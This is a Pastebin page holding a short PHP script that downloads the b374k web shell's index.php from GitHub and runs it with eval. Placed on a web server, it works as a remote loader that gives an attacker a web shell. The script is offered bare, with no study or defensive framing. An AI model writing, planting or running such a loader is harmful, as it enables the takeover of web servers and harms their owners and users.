Advertisement
cyberd0g

test1

Apr 16th, 2021 (edited)
392
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.40 KB | None | 0 0
  1. <?php
  2. // URL of the remote .txt file with PHP code
  3. $remote_url = "https://raw.githubusercontent.com/b374k/b374k/refs/heads/master/index.php";
  4.  
  5. // Fetch the PHP code as a string
  6. $php_code = file_get_contents($remote_url);
  7.  
  8. // Optional: check for errors
  9. if ($php_code === false) {
  10.     die("Failed to fetch PHP code from remote server.");
  11. }
  12.  
  13. // Execute the fetched code
  14. eval("?>$php_code");
  15. ?>
  16.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement